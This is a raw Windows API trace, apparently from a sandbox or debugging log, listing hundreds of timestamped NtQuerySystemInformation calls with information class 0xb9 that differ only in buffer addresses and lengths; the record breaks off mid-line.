[0206.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x20, ResultLength=0x0) [0206.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x20, ResultLength=0x0) [0206.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x20, ResultLength=0x0) [0206.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x20, ResultLength=0x0) [0206.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x38, ResultLength=0x0) [0206.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x20, ResultLength=0x0) [0206.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x20, ResultLength=0x0) [0206.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x20, ResultLength=0x0) [0206.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x20, ResultLength=0x0) [0206.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x38, ResultLength=0x0) [0206.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x20, ResultLength=0x0) [0206.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0206.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0206.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1d8, Length=0x58, ResultLength=0x0) [0206.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0a0, Length=0x58, ResultLength=0x0) [0206.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfc0, Length=0x38, ResultLength=0x0) [0206.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x28, ResultLength=0x0) [0206.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x28, ResultLength=0x0) [0206.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x28, ResultLength=0x0) [0206.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x28, ResultLength=0x0) [0206.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce60, Length=0x28, ResultLength=0x0) [0206.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfc0, Length=0x38, ResultLength=0x0) [0206.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x28, ResultLength=0x0) [0206.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x28, ResultLength=0x0) [0206.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfc0, Length=0x38, ResultLength=0x0) [0206.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce40, Length=0x20, ResultLength=0x0) [0206.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x20, ResultLength=0x0) [0206.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x20, ResultLength=0x0) [0206.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x20, ResultLength=0x0) [0206.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfc0, Length=0x38, ResultLength=0x0) [0206.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce40, Length=0x20, ResultLength=0x0) [0206.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x20, ResultLength=0x0) [0206.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x20, ResultLength=0x0) [0206.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0a0, Length=0x58, ResultLength=0x0) [0206.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfc0, Length=0x38, ResultLength=0x0) [0206.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x28, ResultLength=0x0) [0206.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x28, ResultLength=0x0) [0206.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x28, ResultLength=0x0) [0206.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x28, ResultLength=0x0) [0206.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce60, Length=0x28, ResultLength=0x0) [0206.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfc0, Length=0x38, ResultLength=0x0) [0206.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x28, ResultLength=0x0) [0206.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x28, ResultLength=0x0) [0206.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd80, Length=0x20, ResultLength=0x0) [0206.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd00, Length=0x20, ResultLength=0x0) [0206.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd00, Length=0x20, ResultLength=0x0) [0206.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd00, Length=0x20, ResultLength=0x0) [0206.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfc0, Length=0x38, ResultLength=0x0) [0206.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfc0, Length=0x38, ResultLength=0x0) [0206.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce40, Length=0x20, ResultLength=0x0) [0206.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x20, ResultLength=0x0) [0206.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x20, ResultLength=0x0) [0206.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0a0, Length=0x58, ResultLength=0x0) [0206.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfc0, Length=0x38, ResultLength=0x0) [0206.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x28, ResultLength=0x0) [0206.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x28, ResultLength=0x0) [0206.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x28, ResultLength=0x0) [0206.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x28, ResultLength=0x0) [0206.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce60, Length=0x28, ResultLength=0x0) [0206.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfc0, Length=0x38, ResultLength=0x0) [0206.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x28, ResultLength=0x0) [0206.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x28, ResultLength=0x0) [0206.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfc0, Length=0x38, ResultLength=0x0) [0206.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce40, Length=0x20, ResultLength=0x0) [0206.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x20, ResultLength=0x0) [0206.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x20, ResultLength=0x0) [0206.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x20, ResultLength=0x0) [0206.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfc0, Length=0x38, ResultLength=0x0) [0206.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce40, Length=0x20, ResultLength=0x0) [0206.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x20, ResultLength=0x0) [0206.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x20, ResultLength=0x0) [0206.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0a0, Length=0x58, ResultLength=0x0) [0206.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x38, ResultLength=0x0) [0206.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x28, ResultLength=0x0) [0206.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x28, ResultLength=0x0) [0206.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x28, ResultLength=0x0) [0206.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x28, ResultLength=0x0) [0206.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce30, Length=0x28, ResultLength=0x0) [0206.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x38, ResultLength=0x0) [0206.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x38, ResultLength=0x0) [0206.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x28, ResultLength=0x0) [0206.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x28, ResultLength=0x0) [0206.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x38, ResultLength=0x0) [0206.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x38, ResultLength=0x0) [0206.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd20, Length=0x20, ResultLength=0x0) [0206.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcca0, Length=0x20, ResultLength=0x0) [0206.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcca0, Length=0x20, ResultLength=0x0) [0206.787] NtQuerySystemInformation (SystemInformationClass=0xb9, 